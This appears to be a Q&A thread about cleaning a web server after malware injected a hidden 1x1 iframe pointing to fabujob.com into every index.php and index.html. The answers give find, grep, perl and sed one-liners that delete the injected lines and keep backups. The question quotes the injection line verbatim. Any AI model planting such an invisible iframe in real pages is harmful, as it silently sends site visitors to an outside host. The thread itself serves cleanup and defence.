Search for index.php and index.html and replace string


I recently had some sort of malware on my computer that added the following string(s) to every index.php and index.html ON THE WEB SERVER:

echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

The parameter after "click=" always changes; these two are only examples.

Is there a quick way to find and remove these lines?

EDIT: The files are on my web server, which I can only reach over FTP, so I can't just run find on them...










Tags: ftp, replace






edited May 21 at 13:50 by yagmoth555
asked Jul 18 '09 at 0:17 by Jonas
  • You want to do what the malware is doing? – random, Jul 18 '09 at 8:29

  • No. I want to remove the line! – Jonas, Jul 18 '09 at 15:54



























5 Answers
































One easy way to do this is with find and grep, plus perl to do the edits.

First, construct a list of the filenames that have been compromised:

find /path/to/web/site \( -name 'index.htm*' -o -name 'index.php' \) -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt

Next, use perl to edit the files and remove the exploit:

cat /tmp/compromised-files.txt |
xargs -d '\n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'

(yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)

That will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore it if something goes wrong; delete the backups when you no longer need them.

This perl one-liner is based on the sample you gave, which appears to indicate that the attack added an entire line containing the exploit, so it prints every line EXCEPT those containing the exploit's URL. If that's not actually the case, you'll have to come up with a more appropriate script :)

This is a generic technique you can use to make any automated edit to a batch of files. You can use any perl code to do the job, and perl has a huge swag of text-manipulation capabilities.

BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. That way it doesn't matter if you screw up the editing script...just rsync the original back over the working dir. Once you've got the script exactly right, you can then run it on the real files.






answered Jul 18 '09 at 1:40 by cas







  • Thanks for this extraordinarily awesome answer, but unfortunately I forgot to tell you that it is on my web server (FTP), not on my local computer – Jonas, Jul 18 '09 at 16:10

  • If you can run CGI or PHP scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths: you'll need to know the full path to your document root and the full paths to the programs (find, xargs, perl, sed, etc). Running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first. – cas, Jul 18 '09 at 23:02

  • Alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server (see the sketch after these comments). You really ought to have a complete copy of your site on your own machines anyway; no matter how good the hosting company is, relying on them solely for backup is a bad idea. – cas, Jul 18 '09 at 23:03

  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you! – Jonas, Jul 18 '09 at 23:22
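Following up on the download-clean-upload suggestion in the comment above: here is a minimal shell sketch of that round trip, assuming wget and lftp are available locally. USER, PASSWORD, ftp.example.com and /htdocs are placeholders for your own FTP credentials and document root, and the cleanup step simply reuses the perl one-liner from this answer. Treat it as a starting point and try it against a spare copy of the site first.

# Mirror the site down over FTP (placeholder credentials, host and path)
wget -m 'ftp://USER:PASSWORD@ftp.example.com/htdocs/'

# Clean the local copy with the same perl one-liner as above
cd ftp.example.com/htdocs
find . \( -name 'index.htm*' -o -name 'index.php' \) -print0 |
  xargs -0 perl -n -i.BAK -e 'print unless m/fabujob.com/i'

# Drop the .BAK backups once the result looks right, then push the
# cleaned tree back up ("mirror -R" uploads local -> remote)
find . -name '*.BAK' -delete
lftp -u USER,PASSWORD ftp.example.com -e 'mirror -R . /htdocs; quit'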
































sed and find should help you, but sed takes some time to learn (enough that I can't come up with a suitable command off the top of my head right now).

Also, there are GUI editors that are capable of find-and-replace across a whole directory tree (e.g. TextMate on the Mac). You would then use a regex to cover the variable part.
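For what it's worth, one possible pattern for the variable part, based only on the two sample lines in the question (which suggest the click token is upper-case letters and digits); adjust the character class if the token can look different. The grep call below is just a way to test the pattern against a local copy of the tree before trying it in an editor:

# List files containing the injected URL with its variable click token
grep -rlE 'fabujob\.com/\?click=[A-Z0-9]+' /path/to/web/site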






answered Jul 18 '09 at 0:28 by Sven



























Try regexxer or rpl-type tools. Their whole purpose is project-wide replacement. They support recursing into directories and let you choose the file types to which the replacement should be applied.






answered Jul 18 '09 at 3:31 by Saurabh Barjatiya


























Assuming that the domain is always the same and shouldn't legitimately exist anywhere:

find <documentroot> \( -name 'index.html' -or -name 'index.php' \) \
    -exec sed -i'.bak' '/fabujob.com/d' '{}' \;

Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.
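As a small follow-up (not part of the original answer), and assuming GNU find plus the same <documentroot> placeholder, you can check that nothing was missed and then drop the backups once you are happy with the result:

# Report any remaining injected lines, then delete the sed backups
grep -r 'fabujob.com' <documentroot> || echo 'no matches left'
find <documentroot> -name '*.bak' -delete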






answered Jul 18 '09 at 9:44 (edited Jul 18 '09 at 10:31) by Dan Carley




























If you know you have no <iframe> tags in your documents, you can simply do

perl -i -n -e'print unless /<iframe/' $(find . -name index.html)

If you do have iframes, then you'll need to make your regex more exact.

Perl's -i flag is far too often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
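A variation on the same one-liner (an editorial sketch, not from the original answer) that also covers index.php and sidesteps the word-splitting problem of $(find ...) by pairing find -print0 with xargs -0:

find . \( -name 'index.html' -o -name 'index.php' \) -print0 |
  xargs -0 perl -i -n -e 'print unless /<iframe/'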






answered May 3 '10 at 18:46 by Andy Lester



